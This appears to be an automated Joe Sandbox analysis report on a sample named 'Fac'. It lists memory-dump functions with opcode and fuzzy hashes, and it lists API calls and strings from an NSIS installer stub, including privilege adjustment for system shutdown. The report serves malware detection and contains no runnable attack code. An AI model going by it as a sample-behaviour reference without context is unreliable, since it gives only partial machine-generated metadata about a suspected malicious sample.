Instruction ID: a86804b685dab59bfb3d2ba652d1de673fe818d82702a71f99d03ff18e8f3082
Opcode Fuzzy Hash: 0904b9aafe9088c52640de71fbb88a60afb84a82410b5ffc9e958a276d1ef2ec
Instruction Fuzzy Hash: 8921B330300202CBDB2456698854B3B2696AFC474AF258039DC16DFBA9EF66CC87D391

Function 36FDE6E0 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f88f7fdbe567f4bebbe87dbf59e87ac24d077321df46fa9dfde06a479edc102
Instruction ID: f7bf52758842d86c90fb2cb3b6989a45d1d1603ab5ac901ccdddcac38e6f1fc1
Opcode Fuzzy Hash: 0f88f7fdbe567f4bebbe87dbf59e87ac24d077321df46fa9dfde06a479edc102
Instruction Fuzzy Hash: D531D436A08368EFF328DB18C49085A37F2FB54B0CB484C65E015AB659CB71FC19CB94

Function 001528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7b84d59f60f7d97cf20fb89bc827f18c8faa3b139031625e4e482712cc661d8
Instruction ID: 04c331a74247abf27dca292850e96b829d281358ac7c1ed0a3f6674f766d86f8
Opcode Fuzzy Hash: e7b84d59f60f7d97cf20fb89bc827f18c8faa3b139031625e4e482712cc661d8
Instruction Fuzzy Hash: 89219236A002149FCF18DB68C440AAE7BA5EB9E364F60C159D81A9B354DF31EE46CBD1

Function 00156300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db3ff6fb5c91012d78af7b6bd8d9ee7a74d19c8fe5180ed2851a7c194543584e
Instruction ID: b00cdd907b0549c982077f00c0b541c4948f5ab0215df9ec14ac0fff5b1f36c8
Opcode Fuzzy Hash: db3ff6fb5c91012d78af7b6bd8d9ee7a74d19c8fe5180ed2851a7c194543584e
Instruction Fuzzy Hash: EB21D135300610CBC7199B29C858A2EB7A2FF897527554038E81ADF7A4CF34DC068BD0

Function 000AD044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457057782.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118ec38c1209ddc1ff6606f8452c6052f6ff05f7847915e796f04303ad327f4d
Instruction ID: 76cbac0f2e850851506cbdd3d6e63ceb84e9a664c4f069dce61f72e06f4856cd
Opcode Fuzzy Hash: 118ec38c1209ddc1ff6606f8452c6052f6ff05f7847915e796f04303ad327f4d
Instruction Fuzzy Hash: 31210775504344EFDB24CFA4D9C4F16BBA1FB85314F24C96EE84A4FA42C736D846CA62

Function 00155649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1087e216192dc4863ecf1aa05b547360abb43df719843f732ee69731c583e416
Instruction ID: 968d31d85504f47c3e09470c3cbc90dd481a593167ab96169c8328b53e800179
Opcode Fuzzy Hash: 1087e216192dc4863ecf1aa05b547360abb43df719843f732ee69731c583e416
Instruction Fuzzy Hash: C5210431209288CFCB019F24D964BAA3BB2EF59311F604079FC199F255CB389D55DBA0

Function 00154285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f4dc99734b2546a0d760df261d53838a72f81857c9406f0b383ae7cbf988f56
Instruction ID: bfcbf91511ddc6186d63296181309121295d796c35a18024be8d95ceaa3e0508
Opcode Fuzzy Hash: 6f4dc99734b2546a0d760df261d53838a72f81857c9406f0b383ae7cbf988f56
Instruction Fuzzy Hash: 21318E78E01348CFCB48DFA8D58499DBBB6FF49315B208069E819AB364D735AD46CF00

Function 0015F641 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 557af6db02f50f1399723c0411a5c90014951bc958f7f04ca0e1ca10b9aad430
Instruction ID: 97c6845cbd49b5c08272d2d6f9294dbbf25a6fef8f7d3bea35f592737b9b4310
Opcode Fuzzy Hash: 557af6db02f50f1399723c0411a5c90014951bc958f7f04ca0e1ca10b9aad430
Instruction Fuzzy Hash: D8217A74D002499FEB01DFB4C950ACEBBF1FB82300F1885A9D054AB261EB745A0ACB81

Function 00159761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14826abfda064d1bd9f558ae190da481dfef192282c4156b0d2ee87088986700
Instruction ID: 0853e1185979ef03b3c485d1efc1408adf185e44fa9f76c8c84ad36bfa2afdfc
Opcode Fuzzy Hash: 14826abfda064d1bd9f558ae190da481dfef192282c4156b0d2ee87088986700
Instruction Fuzzy Hash: 80216D34E01248DFCB15CFA1D550AEDBFB6EF49305F248069E815BA2A0DB34D985DF60

Function 001562F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dce96775a9ee87a00ce0f393ca03e3f67efd3d68f0446bf8744766c0834b00c3
Instruction ID: f04297568606860fbc3cf72c25ce3715f7311cd447b87d58b669d7c765c30e18
Opcode Fuzzy Hash: dce96775a9ee87a00ce0f393ca03e3f67efd3d68f0446bf8744766c0834b00c3
Instruction Fuzzy Hash: CB119135705611CFC7155B29C86862E7BB2BF853523594079E81ACF7A4CF25DC468790

Function 001527F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4b67710ec62e925a5437c3989d89b4756133d8bc34c479e8daa974e6d06ffb43
Instruction ID: 5e3a05a94311be9d35261b4922ffa90d74e19d5db1bf0e24faab6778b6f0cd05
Opcode Fuzzy Hash: 4b67710ec62e925a5437c3989d89b4756133d8bc34c479e8daa974e6d06ffb43
Instruction Fuzzy Hash: 4121E274D052498FCB01DFA9D8445EDBFF0AF4A300F10526AD849B7224E7345A89CBA5

Function 0015F650 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4054dcbbb9f8b46321c87e58d7399ca89cf507096118b680015777a4b176078d
Instruction ID: 1acbca29f4309b3e0c460ec0bab63974076d7987915672bc5caada73e2dd46f9
Opcode Fuzzy Hash: 4054dcbbb9f8b46321c87e58d7399ca89cf507096118b680015777a4b176078d
Instruction Fuzzy Hash: 50113A74D00249DFEB04EFB9C940BDEBBF1FB85304F148569D018AB264EB785A06CB81

Function 000AD03F Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457057782.00000000000AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 000AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ad000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2aeda6f11bc70ba116972f889eba25dcc4d56d84c170f1ffcc5a19cb76d94046
Instruction ID: 4311974c3cc51f9a9677fd7456bd4633fd68379ff3d7868758a9ac9448c0c7d3
Opcode Fuzzy Hash: 2aeda6f11bc70ba116972f889eba25dcc4d56d84c170f1ffcc5a19cb76d94046
Instruction Fuzzy Hash: 4311D075504280DFCB11CF54C5C4B15BBA1FB85314F24CAAEE8494BA52C33AD84ACF52

Function 00155E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
Instruction ID: aa864a3ae522808f2c87094be09c5eed03dc4ba5139dbb19e23f810937a4a8ad
Opcode Fuzzy Hash: 99a7fe2953234f4cbd345c8e46fda7ce4ffa8beb8884fe8059336424f89745a7
Instruction Fuzzy Hash: 69016832704204AFCB068F649C217AE3BB7DFC9350B148066FD18DB290DB318E069B90

Function 36FDEBD3 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a73bbb0b39eca4e3ccb379539fd00034db91a4400455afc559ff6f7f3d127c1f
Instruction ID: 55f5d20613607726e5f4359bbf87ccba99ccb8f0952318b0989273b7c541f845
Opcode Fuzzy Hash: a73bbb0b39eca4e3ccb379539fd00034db91a4400455afc559ff6f7f3d127c1f
Instruction Fuzzy Hash: DC0165B5E002218FD755EF38D84894E7BF5FF8862675545AAE849DB324EB30D802CB91

Function 0015E8E9 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f066e913aee3267e1869fffcd803b713df006af4f2b673c1f5576af5db94034
Instruction ID: 5790845ecf7917c3daf647391ad8c1fc4d1312ad7dfdb9d22e10dba1e3f3a831
Opcode Fuzzy Hash: 9f066e913aee3267e1869fffcd803b713df006af4f2b673c1f5576af5db94034
Instruction Fuzzy Hash: F2111B78D00349AFDB01CFA8D844AAEBBB1FF4A300F014566D910A7360D7395A56DFA1

Function 0015ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e7fc48247acdb778a8fcb3ba683eeea30dd70c0f767518c82b0899fddc062cce
Instruction ID: 0fa1746e47eabf9e0a26b00988ce4a135864363744e6f258d7f046b1cbcf4ee9
Opcode Fuzzy Hash: e7fc48247acdb778a8fcb3ba683eeea30dd70c0f767518c82b0899fddc062cce
Instruction Fuzzy Hash: 7BF09C313806108B87255A2EE85472A76EEEFC8B56395417AED19CF361DF21CC468791

Function 36FDE680 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd6114c153879808ecb1ec0ad0503c84f0ce0da505c82990e2189afbd0bdd2ac
Instruction ID: 84aaff7818a8e5fe8c434e53791b34df16cda913a2118c7fdda739cca29ed70b
Opcode Fuzzy Hash: bd6114c153879808ecb1ec0ad0503c84f0ce0da505c82990e2189afbd0bdd2ac
Instruction Fuzzy Hash: EBF0FA343042108FE3048B29D91092A3BFAAF86B54B1840B6FA09CF272DB20DC0287A0

Function 36FDEB48 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8a5abc94ff8c6ea2d6d3df94f619e7b362d601be7e86c01ad8775762cbdd99f
Instruction ID: 09748baa685a906a3431d226548422fdf79dae5f7fe027a3f324180dc5704cdd
Opcode Fuzzy Hash: c8a5abc94ff8c6ea2d6d3df94f619e7b362d601be7e86c01ad8775762cbdd99f
Instruction Fuzzy Hash: F301F671E00319CFDF44EFB9C8006DEBBF5AF48201F14856AD519F7294EB39A9018B91

Function 0015AF36 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
Instruction ID: 0c3463949ee1ae525ac12f5af34df97a838c65e52c2bb33d2cf00fd7680a4862
Opcode Fuzzy Hash: c9fd6afbcb5828346a82c089bfbc9137f51634ca9dff74ed045c9ef063690ae8
Instruction Fuzzy Hash: 0601D176608244DFCB159F64DC80B88BF71BF8A324F580296E9209B2E2C7308C14CB10

Function 36FDE690 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e5de77c43bdfa1cbfa39c9873f76036fe8eadc3aacf25463d6f89098068e4fb
Instruction ID: fb65d604ab2f0d3ddb63fce668c6c3cb92d0b863013064c70514db30489cecfc
Opcode Fuzzy Hash: 5e5de77c43bdfa1cbfa39c9873f76036fe8eadc3aacf25463d6f89098068e4fb
Instruction Fuzzy Hash: 02F08C393102148FE7089B2AD85892A37EAEFC9715B4484B9F60ACF760DE70EC018790

Function 00156739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5795e6afb386356028bc41ee665b9f43a15c8f6a5abe39a9b42a39c2fd69333c
Instruction ID: e5b2a04d750086305724d8474f5fb3362c6576f5e7f8e39e1db47839783f3888
Opcode Fuzzy Hash: 5795e6afb386356028bc41ee665b9f43a15c8f6a5abe39a9b42a39c2fd69333c
Instruction Fuzzy Hash: 33E086384183814FCB13A771D8548C87F75AF42100B0441A5E0054F576DEB9064BCB22

Function 00159C41 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
Instruction ID: e07f69eb9864daab4bc7e152dae6a04e1e42d7d8ab62cf44b6f8a855657936cc
Opcode Fuzzy Hash: 2db57f94c1a11846ba630e2626c5793562846ae42eb2105db4cdafdbcb440977
Instruction Fuzzy Hash: 60E0EC36A00108DFDF05CF59E844AEDB7B2EB98326F11C066EA198B214D7358A65DB91

Function 001528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b06fa957e4e1ca605f3a2ea440518e951bf130f908a342c250dc96ea7bdffcd6
Instruction ID: 7f085a4d912e108f49a94237586fcd1327890d47b38d94b5450663ef935d393d
Opcode Fuzzy Hash: b06fa957e4e1ca605f3a2ea440518e951bf130f908a342c250dc96ea7bdffcd6
Instruction Fuzzy Hash: 44D05B31D2032A57CB10E7A6DC044DFFB38EED5321B508666D51437144FB707659C6E1

Function 001528AB Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d461efec44e991234ad428e7e5d3d91783a5c6fce93d3c92c040b77832f77fe
Instruction ID: 7a2920791a499d263fcf1417d5a56d0151cbc6bd7f4ce7fcadd5cfad5e2ce203
Opcode Fuzzy Hash: 2d461efec44e991234ad428e7e5d3d91783a5c6fce93d3c92c040b77832f77fe
Instruction Fuzzy Hash: 09D02B31D2032AC6CB00EBA5DC000EDB734AEC4321B54C253D03433190EB30265DCAA0

Function 00158EF8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction ID: 7664a699ddf78696b84bb1121c3968f2adab32b7b61b11eb126afe8992ed5369
Opcode Fuzzy Hash: 4bdaacd32790817b91c477bf05988045433f614a4c8c6b26760f84615e577b64
Instruction Fuzzy Hash: 64C0803310C1246A9234104E7C40DA3774DC3C53B5A210137FD3CE7200DC425C8401F4

Function 0015AFF7 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc20eb2575b35d2adf2b19958c69f1ccd049f4ce77ba6281e343b12e3718ff2a
Instruction ID: 5a5e20dac450eea295929e38fef8c42666cb87d2dc3dfc5942c31ec267a3abbe
Opcode Fuzzy Hash: dc20eb2575b35d2adf2b19958c69f1ccd049f4ce77ba6281e343b12e3718ff2a
Instruction Fuzzy Hash: B3D01277B04008DB8F055A94EC509EDFB35FB88213B294553E92596120973249259B50

Function 0015D2CC Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ff344358c5dbcaf8c7437a669fe0d2fbbb9cdf7099875d8b6e6b3ac164f8982
Instruction ID: 1b720ef41a2655a68220b08526c0a365fcb7a56b9c46126f00f9ccddcca2bceb
Opcode Fuzzy Hash: 5ff344358c5dbcaf8c7437a669fe0d2fbbb9cdf7099875d8b6e6b3ac164f8982
Instruction Fuzzy Hash: F8D04235E04109CBCB20DFA4E4448DCBBB5EF89312F24502AE929A7611D63054958F06

Function 0015AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed76e573484be8f1beaddd0d05605a670b1139d5362b95f82a961f20d607f32
Instruction ID: 8b1095a08bc6b551a52ab6bd61c3a7a26f083291fedef364d0d503579186a28a
Opcode Fuzzy Hash: 8ed76e573484be8f1beaddd0d05605a670b1139d5362b95f82a961f20d607f32
Instruction Fuzzy Hash: 9AD0673AB000089BDB149F98EC909DDF776FB98221B148126F915A3260C7319965DBA0

Function 00156748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a4202739f6df9baefef42a5eff493b32686ecb1461b89c99a062ecbdfbbf986
Instruction ID: 60a9a7a6536aad5c8fc189af24a060fdf8d9ab2969f365d294daf812251a11e1
Opcode Fuzzy Hash: 5a4202739f6df9baefef42a5eff493b32686ecb1461b89c99a062ecbdfbbf986
Instruction Fuzzy Hash: E7C012385143184BD951F771DC55D95736EA7C0200B408420B0090A979EFB916878B96

Non-executed Functions

Function 00403359 Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 410stringfilecomCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32 ref: 0040337C
GetVersion.KERNEL32 ref: 00403382
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033B5
#17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033F2
OleInitialize.OLE32(00000000), ref: 004033F9
SHGetFileInfoW.SHELL32(004216A8,00000000,?,000002B4,00000000), ref: 00403415
GetCommandLineW.KERNEL32(00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 0040342A
CharNextW.USER32(00000000,00435000,00000020,00435000,00000000,?,00000006,00000008,0000000A), ref: 00403462

Part of subcall function 0040665E: GetModuleHandleA.KERNEL32(?,00000020,?,004033CB,0000000A), ref: 00406670
Part of subcall function 0040665E: GetProcAddress.KERNEL32(00000000,?), ref: 0040668B

GetTempPathW.KERNEL32(00000400,00437800,?,00000006,00000008,0000000A), ref: 0040359C
GetWindowsDirectoryW.KERNEL32(00437800,000003FB,?,00000006,00000008,0000000A), ref: 004035AD
lstrcatW.KERNEL32(00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035B9
GetTempPathW.KERNEL32(000003FC,00437800,00437800,\Temp,?,00000006,00000008,0000000A), ref: 004035CD
lstrcatW.KERNEL32(00437800,Low,?,00000006,00000008,0000000A), ref: 004035D5
SetEnvironmentVariableW.KERNEL32(TEMP,00437800,00437800,Low,?,00000006,00000008,0000000A), ref: 004035E6
SetEnvironmentVariableW.KERNEL32(TMP,00437800,?,00000006,00000008,0000000A), ref: 004035EE
DeleteFileW.KERNEL32(00437000,?,00000006,00000008,0000000A), ref: 00403602

Part of subcall function 00406284: lstrcpynW.KERNEL32(?,?,00000400,0040342A,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406291

OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036CD
ExitProcess.KERNEL32 ref: 004036EE
lstrcatW.KERNEL32(00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403701
lstrcatW.KERNEL32(00437800,0040A26C,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403710
lstrcatW.KERNEL32(00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040371B
lstrcmpiW.KERNEL32(00437800,00436800,00437800,.tmp,00437800,~nsu,00435000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403727
SetCurrentDirectoryW.KERNEL32(00437800,00437800,?,00000006,00000008,0000000A), ref: 00403743
DeleteFileW.KERNEL32(00420EA8,00420EA8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 0040379D
CopyFileW.KERNEL32(00438800,00420EA8,00000001,?,00000006,00000008,0000000A), ref: 004037B1
CloseHandle.KERNEL32(00000000,00420EA8,00420EA8,?,00420EA8,00000000,?,00000006,00000008,0000000A), ref: 004037DE
GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 0040380D
OpenProcessToken.ADVAPI32(00000000), ref: 00403814
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403829
AdjustTokenPrivileges.ADVAPI32 ref: 0040384C
ExitWindowsEx.USER32(00000002,80040002), ref: 00403871
ExitProcess.KERNEL32 ref: 00403894

Strings

~nsu, xrefs: 004036F9
SeShutdownPrivilege, xrefs: 00403823
TMP, xrefs: 004035E9
Low, xrefs: 004035CF
NSIS Error, xrefs: 0040341B
\Temp, xrefs: 004035B3
Error launching installer, xrefs: 00403684
UXTHEME, xrefs: 004033A9, 004033AE, 004033B4
TEMP, xrefs: 004035E1
.tmp, xrefs: 00403715

Memory Dump Source

Source File: 00000002.00000002.43457672359.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.43457637795.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457709803.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457745120.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.43457782280.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Fac.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3195845224
Opcode ID: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
Instruction ID: 33263885e95349ea6af21411810ae013db8a0064eb9284cbb984bc5e65c45519
Opcode Fuzzy Hash: 9120bc7a57e974a7d2d76e8b13b81fd73d356f704ea9d9fe3a84bd0e3f5ba064
Instruction Fuzzy Hash: ABD12771200301ABD7207F659D45B3B3AACEB4074AF50487FF881B62E1DB7E8A55876E

Function 00404C68 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404C80
GetDlgItem.USER32(?,00000408), ref: 00404C8B
GlobalAlloc.KERNEL32(00000040,?), ref: 00404CD5
LoadBitmapW.USER32(0000006E), ref: 00404CE8
SetWindowLongW.USER32(?,000000FC,00405260), ref: 00404D01
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D15
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404D27
SendMessageW.USER32(?,00001109,00000002), ref: 00404D3D
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D49
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D5B
DeleteObject.GDI32(00000000), ref: 00404D5E
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D89
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D95
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2B
SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E56
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E6A
GetWindowLongW.USER32(?,000000F0), ref: 00404E99
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404EA7
ShowWindow.USER32(?,00000005), ref: 00404EB8
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404FB5
